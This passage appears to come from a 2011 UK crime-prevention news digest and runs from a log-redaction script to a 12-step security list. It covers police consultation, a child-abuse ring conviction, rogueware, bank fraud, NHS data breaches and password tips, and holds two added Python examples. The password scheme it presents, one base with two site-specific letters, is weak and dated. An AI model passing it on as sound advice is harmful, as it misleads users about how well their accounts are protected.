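    '200 512 "http://apps.example.test/game/?access_token=CONSTRUCTEDTOKEN123'
    '&ref=bookmark" "Mozilla/5.0"',
    '203.0.113.9 - - [10/May/2011:09:14:05 +0000] '
    '"GET /pixel.gif?access_token=CONSTRUCTEDTOKEN456 HTTP/1.1" '
    '200 43 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/May/2011:09:15:40 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "http://www.example.test/news?page=2" "Mozilla/5.0"',
    'truncated line without the expected fields',
]


def _scrub(component):
    """Redact sensitive parameters in one query or fragment string."""
    pairs = parse_qsl(component, keep_blank_values=True)
    hits = [k for k, _ in pairs if k.lower() in SENSITIVE_PARAMS]
    if not hits:
        return component, []          # leave untouched strings byte-identical
    cleaned = [(k, REDACTED if k.lower() in SENSITIVE_PARAMS else v)
               for k, v in pairs]
    return urlencode(cleaned), hits


def redact_url(url):
    """Return (url with token values replaced, list of parameter names found)."""
    parts = urlsplit(url)
    query, q_hits = _scrub(parts.query)
    fragment, f_hits = _scrub(parts.fragment)
    clean = urlunsplit((parts.scheme, parts.netloc, parts.path, query, fragment))
    return clean, q_hits + f_hits


def scan_log(lines):
    """Scan log lines; return (findings, redacted lines, unparsed line numbers)."""
    findings, cleaned, unparsed = [], [], []
    for lineno, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            # Do not guess at the layout: flag the line for manual review.
            unparsed.append(lineno)
            cleaned.append(line)
            continue
        new_line = line
        # Referer sits to the right of the request target, so rewrite it first;
        # the target's offsets then still refer to the right characters.
        for field in ("referer", "target"):
            clean, hits = redact_url(match.group(field))
            if hits:
                start, end = match.span(field)
                new_line = new_line[:start] + clean + new_line[end:]
                findings.append({"line": lineno, "field": field,
                                 "params": hits, "client": match.group("host")})
        cleaned.append(new_line)
    findings.sort(key=lambda f: f["line"])
    return findings, cleaned, unparsed


if __name__ == "__main__":
    found, redacted, skipped = scan_log(SAMPLE_LOG)
    for item in found:
        print("line %(line)d: %(params)s in %(field)s from %(client)s" % item)
    print("lines needing manual review:", skipped)
    print("\n".join(redacted))
```

Redacting a log only removes stored copies; according to the article, a leaked token keeps working until the user changes their password.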


 

METROPOLITAN POLICE SURVEY ON FRONT COUNTERS
(From the office of Joanne McCartney the London Assembly member for Enfield and Haringey, dated 6th May 2011)

This Survey closes on 27th May 2011.

Assembly Member and lead Labour Member for Policing Joanne McCartney urges residents to have their say.

The Metropolitan Police have launched a survey to hear from Londoners how they access police services. The Met are reviewing the way the public access police services and police front counters, which includes access to police stations.

Joanne McCartney said "The Met's review could lead to possible closures of some police stations in local areas, so it is vital that residents have their say at this early stage."

The survey asks about telephone and on-line services as well as front counter availability, and the feedback is intended to inform the Metropolitan Police plans to review public access later in the year.

Joanne said "This 10 minute survey will shape and inform the wider consultation later in the year which will look in detail at front counters in our local areas."

The Met Police have already stated that one of their options is to have one 24hr police station in each borough supported by scheduled drop in desks in other locations.

Joanne concluded "I am very concerned that the Met's review hasn't been publicised widely, and I want to make sure Londoners take part and make their views heard before the survey closes on 27th May 2011."

Take part in the Metropolitan Police survey at :

http://www.met.police.uk/contacts/public_access_survey.htm

(9th May 2011)



FOUR MEN ADMIT £2.2 million UK CHILD PORN RING
(Sky News, dated 7th May 2011 author Darren Little)
http://news.sky.com  [Note 1] 

Four men have pleaded guilty to offences linked to a multi-million pound internet child porn ring. The group made £2.2m from subscriptions to their 'news service', which was run from the hamlet of Martin Dales in Lincolnshire.

A total of 132 British children have been put into protective custody as a result of the investigation.

More than 1,300 people from 45 countries used the site to access millions of child abuse images.

Those subscribing to the service, called Athenanews, were able to access and download folders labelled "teens", "baby" and "boys".

The investigation has also seen a number of British paedophiles removed from positions of trust, including teachers, doctors and police officers.

Ian Frost, aged 35, of Woodhall Spa, Sheffield, Paul Frost, 37, of Woodhouse, Sheffield, and Ian Sambridge, 32, of St Albans, Herts, pleaded guilty to distributing indecent photos of children.

Paul Rowland, 34, of Woodhall Spa, admitted making, possessing and distributing child porn. Nottingham Crown Court heard all four men will be sentenced at a later date.

Detective Chief Superintendent Roger Bannister from Lincolnshire Police said: "I hope this sends out a powerful message to people with a sexual interest in children worldwide; the internet is not a place for this kind of activity. We will trace you and you will be brought to justice."

Peter Davies, from the Child Exploitation and Online Protection Centre, said: "Many of the images being shared online were horrific.

"The lengths to which people went to try and conceal their criminal activity were huge but did not prevent them being caught by persistent and dedicated work."

The investigation led to the identification of 211 suspects in the UK and there have been 38 convictions to date.



Further Information - prevention and reporting

NSPCC : www.nspcc.org.uk
ChildLine : www.childline.org.uk
CEOP : www.ceop.police.uk

 

(9th May 2011)


 

SLUTWALK MARCH PLANNED FOR LONDON
(BBC News, dated 9th May 2011)
www.bbc.co.uk

A protest movement sparked by a Canadian police officer's advice to women to "avoid dressing like sluts" is coming to England.

The SlutWalk march in London, starting in Trafalgar Square, is being planned for 4th June 2011.

Thousands of people have taken part in such marches across the US and Canada.

Organisers say the aim is to highlight a culture in which the victim, rather than rapist or abuser, is blamed.

'Reaction shows relevance'
 
The Facebook page for SlutWalk London already has more than 3,500 people registered to take part.

Student Anastasia Richardson, 17, who is organising the SlutWalk in London, said that the movement clearly relates to people in Britain.

She said: "I think the reaction shows how relevant it is, especially in Britain where only 6.5% of rape cases end in convictions - and that's the ones we know about."

About 3,000 people took part in the first SlutWalk in Toronto last month and 2,000 people took part in a SlutWalk in Boston on Saturday.

The movement started after Toronto police constable Michael Sanguinetti, who had been giving a talk to a group of students in Toronto, made his remarks. "You know, I think we're beating around the bush here," he reportedly told them. "I've been told I'm not supposed to say this - however, women should avoid dressing like sluts in order not to be victimised."

'Raise our voices'
 
He has since apologised and has been disciplined by the Toronto police. He is still on duty.

The SlutWalk London website said it wants to end a culture of fear and victimisation.

"Let's raise our voices and tell the world that rape is never, ever OK," the website says.

"Not if she was wearing a miniskirt. Not if she was naked. Not if she was your wife, girlfriend or friend. Not if she was a prostitute. Not if she was drunk. Not if you thought she wanted to."

London Slutwalk website : http://slutwalklondon.tumblr.com/about


 

Extract of another article from the Evening Standard online (www.thisislondon.co.uk) [Note 1], dated 9th May 2011.

"The organisers said they wanted to reappropriate the word "slut" to fight a culture of "fear and victimisation", and some marchers wore provocative clothing to emphasise that no one deserves to be attacked. Thousands are now expected to join a SlutWalk from Trafalgar Square to Hyde Park on June 4, at the same time as rallies in Chicago and Amsterdam.

The SlutWalk London website states more should be done to protect victims. It adds: "All over the world, women are constantly made to feel like victims, told they should not look a certain way, should not go out at night, should not go into certain areas, should not get drunk, should not wear high heels or make up, should not be alone with someone they don't know."


 

Further Information

Rape Crisis Centre : www.rapecrisis.org.uk
Samaritans : www.samaritans.org
Victim Support : www.victimsupport.com
National Stalking Helpline : www.stalkinghelpline.org
National Centre for Domestic Violence : www.ncdv.org.uk
Suzy Lamplugh Trust : www.suzylamplugh.org


(9th May 2011)




HOW TO BUILD BETTER PASSWORDS - WITHOUT LOSING YOUR MIND
(PCWorld magazine, 5th May 2011 author Alex Wawro)
www.pcworld.com  [Note 1] 

Original article [Note 1] : http://cwonline.computerworld.com/t/7324879/753476122/510486/0/

Your e-mail password is your last line of defense when it comes to online privacy and security. A hacker who cracks it could reset the passwords of (and gain access to) your social networks, your bank account, and even your identity by taking advantage of the ubiquitous I Forgot My Password button.

It's tempting to use the same password for all of your online accounts, but doing so puts every account in jeopardy if one of them gets hacked. In view of some recent massive security breaches, now's a good time to update your passwords and make sure that each is unique.

A few great password management programs will store all of your passwords in one encrypted database and let you access them with one master password, so you can carry every password you'll ever need on a single thumb drive. A multi-platform password manager with browser support is even easier to use because it automatically syncs between different computers and browsers, giving you access to your encrypted database from any device, though you do sacrifice the security of keeping your password list confined to a single hard drive.

Using a password manager is a great way to improve your personal security online, but it's not perfect. The perfect password is one you never write down -- a unique string of letters, numbers, and symbols that not even you know until the moment you enter it. That may be beyond our grasp, but you can get awfully close by using a few simple mnemonic tricks.

One Password to Rule Them All

It's fairly easy to create strong, unique passwords by following a few simple rules. First, we need a password "base" with a mix of uppercase and lowercase letters, numbers, and even a symbol or two to spice things up. Pick a phrase that will be easy to remember, and feel free to be as creative as you like. For simplicity's sake I'm going to use one of my favorite dishes, chicken adobo, as our example.

Make sure your passphrase is at least eight characters and avoid obviously memorable topics like proper names, birthdays, and hometowns. You should also avoid picking a single word and changing some of its characters to symbols -- hacker tools are sophisticated enough to overcome that trick. Go for a passphrase -- multiple words strung together -- rather than a password; this makes it harder for hackers working to crack your password by trying every word in the dictionary.

Now that we've picked a passphrase, we need to mash that phrase into a single string (chickenadobo), and then sprinkle in a few capital letters that are simple to remember (ChickenAdobo). Next, let's pepper our password base with a few random characters to keep things interesting: Ch!cken@dob0.

Now that we have our base password, we're going to memorize and use it as a skeleton key that will unlock our account on any Website as long as we hold fast to a few simple rules. To create the strongest password possible, we're going to invent a simple naming pattern as a mnemonic device that will help us generate a unique password for every Website we visit.

For example, let's say I decided to always use the first and fourth letter of a Website's domain name in the middle of my passphrase, capitalizing the former while leaving the latter lower-case. That means my Facebook.com account would have the unique password Ch!ckenFe@dob0, while my about.me account would require the password Ch!ckenAu@dob0.

See the pattern? Make up something similar and you'll have a unique alphanumeric password for every website you visit, one that's easy to remember but nearly impossible for hackers to figure out. No password is perfect, but knowing your own unique passphrase and a few mnemonic tricks will go a long way toward keeping your online privacy intact.

(6th May 2011) 
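The naming pattern from the password article above, written out as an added Python example (not part of the original article). It applies the "first and fourth letter" rule, rejects site names too short for it, and reports which sites would end up sharing a password under the rule. The split of the base into "Ch!cken" and "@dob0", the handling of a "www." prefix, counting letters across the dot, and the domain faceplant.example are assumptions made for illustration.

```python
"""The article's site-specific password rule, with its edge cases made explicit."""
from collections import defaultdict

# The article's example base, split where the site letters are inserted.
BASE_PREFIX = "Ch!cken"
BASE_SUFFIX = "@dob0"


def site_letters(domain):
    """Return first letter (upper case) + fourth letter (lower case) of a domain.

    Assumptions: a leading "www." is ignored and only letters are counted,
    so about.me gives a, b, o, u -> "Au".
    """
    name = domain.strip().lower()
    if name.startswith("www."):
        name = name[4:]
    letters = [ch for ch in name if ch.isalpha()]
    if len(letters) < 4:
        # The rule has nothing to pick for very short names such as "x.io".
        raise ValueError("domain %r has fewer than four letters" % domain)
    return letters[0].upper() + letters[3]


def derive(domain, prefix=BASE_PREFIX, suffix=BASE_SUFFIX):
    """Build the per-site password: base prefix + site letters + base suffix."""
    return prefix + site_letters(domain) + suffix


def collisions(domains):
    """Group domains whose site letters, and therefore passwords, are identical."""
    groups = defaultdict(list)
    for domain in domains:
        groups[site_letters(domain)].append(domain)
    return {key: sites for key, sites in groups.items() if len(sites) > 1}


if __name__ == "__main__":
    # facebook.com and about.me come from the article; the third is constructed.
    sites = ["facebook.com", "about.me", "faceplant.example"]
    for site in sites:
        print(site, "->", derive(site))
    print("sites sharing a password:", collisions(sites))
```

Only two characters of each password depend on the site, so the pattern should pick letters that differ between the sites you actually use.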



FBI WARNS THAT FAKE BIN LADEN VIDEO IS A VIRUS
(IDG News Service, dated 3rd May 2011 author Robert McMillan)
www.idg.net/idgns  [Note 1]

The U.S. Federal Bureau of Investigation warned computer users Tuesday that messages claiming to include photos and videos of Osama bin Laden's death actually contain a virus that could steal personal information.

The warning comes as security companies said that they've spotted the first samples of malicious software disguised as photos of the dead Al Qaeda leader.

Security vendor F-Secure said Tuesday that criminals are e-mailing a password-stealing Trojan horse program called Banload to victims, and Symantec said it's seen criminals spamming victims with links to fake "Osama dead" news articles that launch Web-based attacks on visitors.

U.S. authorities do have photos of bin Laden, who was shot in the head during an early morning raid Monday in Pakistan. But these photos have not been released publicly.

Scammers have also used a technique called search engine poisoning to try to trick search engines into listing hacked Web pages that are loaded with malware in their search results. "It's unlikely you'll find pictures or videos of Bin Laden's death online -- but searching for one will certainly take you to sites with malware," wrote F-Secure chief research officer Mikko Hypponen in a blog post.

The FBI warned Internet users to watch out for fake messages on social network sites and to never download software in order to view a video. "Read e-mails you receive carefully. Fraudulent messages often feature misspellings, poor grammar, and non-standard English," the FBI warning stated.

As a major international news event, bin Laden's death has shown the amazing way information can spread online. Many learned of the terrorist leader's death through Twitter, where the story first broke, or Facebook. But it also underscores how the unfiltered media can quickly spread bad information worldwide.

In the two days since the early morning raid, the bin Laden story has generated fake photographs, fake quotes, and plenty of scams.

Security experts said that shady marketers and so-called rogue antivirus vendors have also jumped on the bin Laden bandwagon. The rogue antivirus software bombards victims with pop-up messages telling them they have a computer problem. Its aim: to nag them into paying for bogus software.

Shady marketers are spreading messages on Facebook that try to lure victims into spreading the message to friends and visiting marketing Web sites, by claiming they have a censored video.

"Osama is dead, watch this exclusive CNN video which was censored by Obama Administration due to level of violence, a must watch," is a typical lure used in the scam. Users are encouraged to cut and paste malicious JavaScript code into their browser, which then sends the message to all of their Facebook friends. Security experts say never to cut and paste scripts into the browser.

(5th May 2011)


ARE YOU BLACKLISTED - ADDRESSES CAR INSURERS WON'T TOUCH
(Daily Mail, dated 4th May 2011 author James Salmon)
www.dailymail.co.uk

Honest motorists face soaring premiums as a 'fraud epidemic' sweeping the country causes insurers to blacklist certain postcodes in secret.

Motorists have seen a record 40 per cent hike in premiums over the past year, with the average annual comprehensive policy forecast to break the £1,000 barrier within 12 months.
Insurers say a major reason for this increase is fraudulent claims that are estimated to cost £2.7billion a year, adding £44 to the annual premium of honest motorists.

Confidential documents from a leading fraud specialist shown to Money Mail pinpoint areas across the country where insurers are putting premiums up even further because of high concentrations of fraudulent claims.

And brokers say some insurance firms are refusing to cover motorists at all in certain areas.

Common frauds include staged accidents, often perpetrated by criminal gangs who deliberately cause innocent motorists to crash into them.
Last week, three more people were jailed for a £5.3 million 'cash-for-crash' scam at Luton Crown Court.
Other examples include bogus injury claims - whiplash being the most common - and fronting, where parents cut costs by claiming they are the main driver on an insurance policy for their child's car.

Each year, Keoghs - a law firm specialising in investigating suspicious claims on behalf of insurance companies - publishes the worst areas for fraud.

But it also provides insurers with secret information on the worst postcodes. This list, which is not made public, has been obtained by Money Mail.
The top ten areas for suspicious claims are parts of Birmingham, Liverpool, Bradford, East London, Manchester, North London, Bolton, Blackburn, Southall and Oldham. These towns and cities account for more than four in ten suspicious claims.
The worst 'blackspot' is Birmingham - generating almost one in ten suspicious claims.

This compares with fewer than one in a hundred in West London. But the analysis given to insurers also shows huge variations within towns and cities.
The postcode B8 - east of Digbeth in Birmingham - generated almost 13 per cent of suspicious claims in the city. Meanwhile, just over 1 per cent came from B15 in Edgbaston, according to 2010 analysis.

Areas that have seen the biggest growth in suspicious claims this year include Newcastle, Peterborough, Preston and Chester - all now rated as 'fraud blackspots'.
James Heath, head of counter fraud strategy at Keoghs, said: 'We are now seeing what can reasonably be described as a fraud epidemic across the UK. It is clear from these results that fraud is no longer restricted to the country's most heavily built-up areas.'

The result is that even law-abiding drivers without a claim to their name who live in these areas can struggle to find affordable insurance.

One insurance broker, based in London, told Money Mail about several quotes he had recently secured on behalf of customers where most insurers had refused to provide cover because of the area in which they lived.

One 58-year-old male driver living in Wood Green, North London - N22 - saw his premiums double from £727 to £1,598 when his policy came up for renewal this year.
Zurich, Ageas, Axa, Provident and Royal & Sun Alliance all refused even to provide a quote, labelling it an 'unacceptable' area. A customer living in E4 - Chingford, East London - had a similar problem.

The broker said: 'There is no doubt some postcodes are blacklisted by most insurance companies because these areas are deemed to be too high risk.' Other insurance brokers report a similar story.
Ian Crowder, from the AA, said: 'It's a bit of a postcode lottery. Certainly some areas are in danger of being blacklisted by certain insurance companies because they are seen to pose such a high risk.'

Graeme Trudgill, head of corporate affairs at trade body the British Insurance Brokers' Association, said: 'As with flooding, there are certain areas that insurers are just not keen on. We've heard of rates in some parts of Birmingham tripling.'

The insurance industry - spearheaded by its trade body the Association of British Insurers - says it is doing everything it can to crack down on fraud. In 2006, it set up the Insurance Fraud Bureau to detect fraud and expose criminal gangs. It pools the information of insurance companies and is helping police on 27 police investigations.
Glenn Marr, director of the IFB, said: 'This fraud has an impact on the cost of insurance for genuine customers and the industry is committed to rooting out and bringing to justice those criminals who target insurers.'

An Axa spokesman said: 'For areas where there is a high risk, we do refuse cover and we use historical claims information to help us determine these areas. 'Our experience shows us that certain areas give rise to exceptionally poor claims, but these are not exclusively driven by fraud.

'Axa employs a number of fraud prevention initiatives to ensure we are preventing certain individuals from getting cover rather than penalising large groups.'

'My premium rose £300'
 
Stuart Lea saw his annual motor insurance premium with Direct Line jump from £800 to £1,100 when it came up for renewal this year.
Mr Lea, 33, from Birkenhead, near Liverpool, says he was baffled because he has an impeccable driving record and has built up 15 years of no claims.
'Every year my premiums go up,' he says. 'It's disgusting that honest drivers have to foot the bill for fraudsters.'

Andy Goldby, from Direct Line, says: 'We have witnessed an increase in both the number of claims and their severity in Mr Lea's postcode, in particular relating to whiplash claims.'

(5th May 2011)




THE BIGGEST THREAT TO NHS DATA SECURITY : ITS STAFF
(Guardian Professional, dated 4th May 2011 author Sade Laja)
http://www.guardian.co.uk/guardian-professional

Original Article :

http://www.guardian.co.uk/healthcare-network/2011/may/04/biggest-threat-nhs-data-security-staff?INTCMP=SRCH

Health service staff treat patient confidentiality as a given. But research by Guardian Healthcare shows that employees, rather than IT departments or management, are behind the leading reasons for that confidentiality being broken.

Figures released by 30 trusts in London under Freedom of Information (FoI) suggest that data breaches consist mainly of staff losing devices or information, disposing of it inappropriately or giving out data in error.

There were a total of 909 data breaches of personal information by the 30 trusts in the capital from 2008 to early 2011. NHS Barnet (Primary Care) topped the list with 187 data breaches of personal information over the last three years, with most breaches falling into its consent, communication and confidence or documentation (including record management) categories.

Chelsea and Westminster hospital foundation trust came second with 123 data breaches. The data suggests that the problem is getting worse: in 2008-09 the trust recorded 34 incidents, 44 in 2009-10 and 45 between April 2010 and February 2011.

Guardian Healthcare asked all 71 trusts in London (before the formation of clusters) to list all data breaches by staff of personal information over the last three years, and received 30 responses with the requested data. This data was given in differing formats, with the level of detail in relation to incidents differing from trust to trust. This makes it difficult to put all the breaches into a definitive category, although on a broad scale the majority of incidents would be considered low level.

But the nature of most recorded incidents does suggest that a large number could have been prevented if better data security awareness was in place at these organisations. Such examples include a fax containing patient information being sent to the wrong person at one foundation trust, while confidential waste was emptied and bagged as recycling waste at another.

The most recent incidents at South London healthcare trust, which has logged 53 data breaches since 2008-09, involved the loss of a USB stick, emails being sent to the wrong email address, patient identifiable data being left behind the reception area by a doctor after he or she had left employment at the trust and a member of staff inappropriately viewing patient notes.

The reporting of data breaches remains a grey area. NHS organisations record them in different ways, using different categories to define breaches of personal information. It may also be a possibility that organisations are becoming better at spotting incidents and are therefore reporting them more, while the differing levels between trusts of similar size could be attributed to some not being as efficient as their counterparts at recording data breaches.

Crime and punishment

The Information Commissioner's Office (ICO) has spoken repeatedly about the importance of clear security and disclosure procedures so that staff can understand and properly implement a code of conduct. It has also said that it will not hesitate to punish organisations if a "serious" breach of the Data Protection Act was likely to cause "substantial" damage or distress. But critics of the central government watchdog, which was given new powers last year to issue fines of up to £500,000 for breaches of the act, say that the ICO appears reluctant to impose such penalties.

Most of the low level breaches reported by the London trusts were dealt with internally, with the most common action resulting in training and awareness sessions for staff involved in breaches or new procedures being implemented at the trusts concerned.

"Human error has always been the largest cause of data breaches in the NHS," said Victor Almeida, senior healthcare analyst at Kable. "While it is true that some human errors are unavoidable, such as sending an e-mail to the wrong person, most could be mitigated or avoided by improving end-user legitimisation." This can mean restricting access to locations and preventing the storage of data on mobile media, replacing CDs and USB sticks with access to databases. Better authentication tools can also make a contribution, Almeida added.

Despite high numbers of incidents at some NHS organisations, eight trusts have logged five or fewer data breaches over the past three years. These include NHS Barking and Dagenham and Newham university hospital, which both recorded five from 2008-09 to present, NHS Camden and London Ambulance Service with four, and King's College hospital foundation trust, which logged just three.

The London Ambulance Service said that two of the four incidents it has logged were considered serious, with both involving the theft of patient identifiable material. This included a "small number" of patient report forms being stolen from inside a vehicle in 2010 after a member of staff left them there inside a rucksack.

The best performance among the 30 trusts responding came from the Royal National Orthopaedic hospital trust, NHS Croydon and NHS Havering, which all said that there were no reported data breaches at their organisations between 2008-09 and the present.

Additional Information

Details of the number of data breaches and locations within London :

http://www.guardian.co.uk/healthcare-network/2011/may/04/personal-data-breaches-london-nhs-trusts-data?intcmp=239

(4th May 2011)


FAKE SECURITY SOFTWARE TAKES AIM AT MAC USERS
(ComputerWorld, dated 4th May 2011 author Gregg Keizer)
www.computerworld.com

Original article : http://cwonline.computerworld.com/t/7321287/753476122/510086/0/

Scammers are distributing fake security software aimed at the Mac by taking advantage of the news that al-Qaeda leader Osama Bin Laden has been killed by U.S. forces, a security researcher said today.

A security firm that specializes in Mac software called the move "a very big step forward" for malware makers targeting Apple's users.

Phony antivirus software, dubbed "rogueware" by security experts, has long plagued people running Microsoft Windows, but this is the first time scammers have targeted the Mac with a sophisticated, professional-looking security application, said Peter James, a spokesman for Intego, a Mac-only antivirus company headquartered in France.

"This is indeed a very big step forward for Mac malware," said James.

The program, dubbed MAC Defender, is similar to existing "rogueware," the term for bogus security software that claims a personal computer is heavily infected with malware. Once installed, such software nags users with pervasive pop-ups and fake alerts until they fork over a fee to purchase the worthless program.

Until now, rogueware has been exclusively targeting Windows PCs.

That's changed, according to Kurt Baumgartner, a senior malware researcher with Moscow-based Kaspersky Lab, who today said that one group distributing MAC Defender has also been actively spreading Windows rogueware.

"They have been revving up for this for months," said Baumgartner of the work to prep MAC Defender.

Last month, Baumgartner had reported that ".co.cc" domains -- which are often used to spread malware and host attack code-infected Web sites -- had begun to host fake security sites and deliver the "Best AntiVirus 2011" rogueware.

During his early-April sweep through the .co.cc domains, Baumgartner found a URL explicitly aimed at Macs: "antispyware-macbook(dot)co(dot)cc".

"It is very odd that this group is marketing 'Fast Windows Antivirus 2011' from 'macbook' domains," Baumgartner said at the time in a blog post.

Today, Baumgartner said that a group using .co.cc domains was serving up fake security software for Macs as part of a broader campaign to trick Windows users into downloading and installing phony programs.

That campaign is currently exploiting the hot news topic of Bin Laden's death to get people to click on links that redirect their browsers to the rogueware downloads. The scammers have used "black hat" SEO (search engine optimization) tactics to push links to rogueware higher on Google Images' search results.

But that's not the only way Mac owners have been duped into installing MAC Defender.

On Saturday -- the day before President Obama announced the killing of Bin Laden -- messages from infected users began appearing on Apple's support forums.

"What is macdefender and why is it trying to install itself on my computer?" asked someone identified as "wamabahama" on April 30.

"FYI, my daughter said the program started after clicking on a 'hair style photo,'" added "Mr. Fix It Home Services" on the same support thread. Others reported stumbling upon MAC Defender after searching for images of prom tuxedos or for pictures of a character in the movie "Princess Bride."

On Monday, Intego published a detailed advisory about MAC Defender, noting that it was "very well designed, and looks professional."

Intego spotted MAC Defender and acquired samples on Saturday, said James, who pointed out that users must enter their administrative password to install the program. "So there's still a social engineering angle here," he said.

In fact, users see a generic Windows-oriented page when they first click a link to the rogueware. "They're not even getting a Mac-specific page," James said.

But unless users have Safari set not to automatically open files after downloading, MAC Defender's installation screen opens without any user action. That's been enough to con some into approving the install by typing their administrative password.

The program also relies on an unusual technique to make users pay up.

"Every few minutes, it opens a porn page in the browser," said James of MAC Defender. "We think they're doing this because most people will assume that that means they've got a virus on their Mac, and they need to get rid of it by paying for the program."

MAC Defender demands $60-$80, depending on whether users select a one-year, two-year or lifetime "license."

Ironically, there are only eight to 10 serial numbers that MAC Defender accepts, said James, and those are tucked into the binary file -- unencrypted -- where advanced users may be able to root them out.

James also called out the MAC Defender's look and feel as an indicator that the criminals are serious about reaping profits from Mac users. "This was done by a very sophisticated Mac interface developer," James said. "It's an obvious sign that [scammers] are starting to target Macs. Earlier [scams], such as 2008's MacSweeper just didn't bother trying to look professional."

Intego spotted MacSweeper, a fake Macintosh system cleaning program, in January 2008.

MAC Defender has also created some collateral damage: The rogueware uses the same name as a legitimate German company that develops Mac software.

"A new malware application named MAC Defender (MacDefender.app) for OS X surfaced a few days ago," warned the MacDefender site. "If you see an application/installer named like this DO NOT DOWNLOAD/INSTALL it. I would never release an application named like this."

The rogueware's name choice was probably a twist on "PC Defender" and "Windows Defender," phrases used in the titles of numerous Windows-based fake AV programs, said James.

Mac users running Safari can prevent MAC Defender from automatically opening after it downloads by unchecking the box marked "Open 'safe' files after downloading" at the bottom of the General tab in the browser's Preferences screen.

Editor's Note

This article describes how bogus software is being distributed by hijacking search engine results. The article is also aimed at US Mac users. This does not mean that UK (or any other country for that matter) Mac users will not suffer the same fate. It is surprising that searches for the "Royal Wedding" have not been hijacked. Or have they? If you do get hijacked, close down the browser immediately, don't let the unauthorised software load.

(4th May 2011)


CYBERTHIEVES LOOT SMALL BUSINESSES AND TRANSFER MILLIONS TO FIRMS IN CHINA
(Computerworld, dated 28th April 2011 author Jaikumar Vijayan)
www.computerworld.com

Editor's Note (uaware): A couple of weeks ago in a short article about my "spam inbox" I mentioned that I had received an e-mail about an ACH transaction. The link within that e-mail would have led to a bogus website linked to this type of fraud.

Some U.S. companies may unwittingly be helping to provide millions of dollars in illicit financing to businesses in China.

An alert from the FBI and the Financial Services Information Sharing and Analysis Center (FS-ISAC) this week warned small and midsize U.S. businesses to be on the lookout for online account takeovers and fraudulent Automated Clearing House (ACH) transactions.

The warning comes in the wake of a rash of recent incidents in which online bank accounts belonging to small and midsize businesses (SMB) were hijacked and money from them was stolen and transferred to accounts apparently held by several legitimate businesses in China's Heilongjiang province along the Russian border.

Between March and April, the FBI identified at least 20 incidents in which cybercriminals gained access to SMBs' banking credentials, such as usernames, passwords or authentication tokens, and used them to electronically wire money to accounts held by "Chinese economic and trade companies," the alert said.

The amounts of the illegal wire transfers have ranged from $50,000 to $985,000, with the majority involving sums of more than $900,000.

Many of the companies that have received the money are registered in port cities such as Raohe, Fuyuan, Jixi City, Xunke, Tongjiang and Dongning. The companies appear to be legitimately registered businesses and typically have accounts at the Agricultural Bank of China, the Industrial and Commercial Bank of China and the Bank of China, the alert said.

So far, the break-ins have siphoned $11 million out of SMB accounts. In all, the crooks have attempted to steal $20 million from SMBs in the past month, the alert warned.

Such online account takeovers are not new. The FBI, the FS-ISAC and NACHA, the body that oversees the ACH network, issued a similar warning in the fall of 2009.

At that time, the FBI said several new cases were reported weekly. In most instances, the crooks used sophisticated keystroke logging and Trojan horse programs to steal log-in credentials from company employees authorized to initiate funds transfers on behalf of their employers, the FBI noted in its 2009 alert.

The same warnings were repeated in this week's alert. The alert noted that the malware used in the recent attacks had not been identified in all cases, but at least some instances involved the ZeuS banking Trojan, the Backdoor.bot keylogger and Spybot, an IRC backdoor Trojan.

In addition, one victim reported being hit with malware that allowed hackers to completely erase the hard disk of the infected computer before any investigations could be done, the alert said.

The FBI alerts urged banks to notify customers if they notice any wire transfers destined for Raohe, Fuyuan, Jixi City, Xunke, Tongjiang or Dongning.

Avivah Litan, an analyst at Gartner, said banks need to do more to protect themselves from such attacks, especially since they are in a better position to tackle the problem.

"These attacks are using the same techniques that have been used for a couple of years against business bank accounts and more recently against enterprise systems and security companies," Litan said. "The attacks keep coming, because most banks have yet to build up sufficient defenses."

There has been speculation that the Federal Financial Institutions Examination Council (FFIEC), a standards-setting body for the financial services industry, could soon require banks to implement stronger forms of user authentication, but no action has been taken.

A Gartner survey conducted in February found that many banks continue to rely on "crude" security measures, such as cookies and secret questions, to protect online accounts, Litan said.

"Nearly two-thirds of the surveyed banks manage their fraud detection and customer authentication projects by committee, which means [security is] always someone else's responsibility. It should come as no surprise, then, that the attacks are succeeding."

Original article : http://cwonline.computerworld.com/t/7317817/930454165/509772/0/

(1st May 2011)


ALL FORCES NOW HAVE LATEST NUMBER PLATE RECOGNITION TECHNOLOGY
(NPIA, dated 26th April 2011)
www.npia.police.uk/

The latest National Policing Improvement Agency (NPIA) Automatic Number Plate Recognition (ANPR) software has now been rolled out to all forces and has significantly boosted policing capability to tackle major crime and terrorism. The software, BOF II v2.3, developed by Northgate Public Services in conjunction with the NPIA, now allows all forces to share vehicle intelligence and access the National ANPR Data Centre (NADC). The centre, managed by the NPIA, receives approximately 15 million records each day. The BOF and the NADC are fully integrated with the Police National Computer (PNC), which enables officers to receive instant notification when a vehicle of interest passes a camera. The rollout, which took place between November 2010 and March 2011, followed an extended period of testing by the NPIA and pilot forces including Metropolitan Police, Essex and West Midlands.

The use of ANPR is embedded within core policing. A highly effective operational policing tool, ANPR allows police to target known offenders. Senior police officers say the technology is important in tackling crime, increasing police officer productivity and has been used in some high profile court cases, including terrorism trials. As criminals become increasingly more sophisticated in their activities, the latest ANPR software demonstrates how the NPIA is instrumental in enabling the police service to update their crime fighting capability.

NPIA policy and guidance has also safeguarded the privacy of individuals by ensuring the data may only be accessed for serious crime and on the authority of senior officers. For the past two years, the ANPR Programme Team has been working with the Association of Chief Police Officers (ACPO) and the Information Commissioner's Office (ICO) to ensure that the use of ANPR by the police effectively balances individual privacy rights against operational requirements.

Mark Jones, Head of the ANPR Programme, NPIA said: "By adopting an open approach in working with the ICO, we have been able to produce data collection, retention and use guidelines on behalf of ACPO and then build upon existing technology to give forces a tool that enables them to address privacy concerns."

The NPIA, through its ANPR Programme, continues to enhance the effectiveness of the National ANPR Infrastructure in partnership with ACPO and in consultation with the ICO.

(1st May 2011)


HOW TO SECURE YOUR LIFE IN 12 STEPS
(ComputerWorld, dated 25th April 2011 author Nick Mediati)
www.computerworld.com
Category : crime prevention

ORIGINAL ARTICLE : http://cwonline.computerworld.com/t/7312235/753476122/509242/0/

Good security advice can be hard to find. Lots of security experts offer help, but not all of their tips are accurate or up-to-date, and many address PC security only. So even if you follow their advice, you may be more vulnerable than you think. That's where we come in. We've assembled a dozen simple but essential tips, a "12-step security program" to keep your PC, smartphone, gadgets, and identity safe. The steps are practical and fairly easy to perform, so you can strengthen your security without losing your mind in the process.

1. Use virtual credit card numbers to shop online
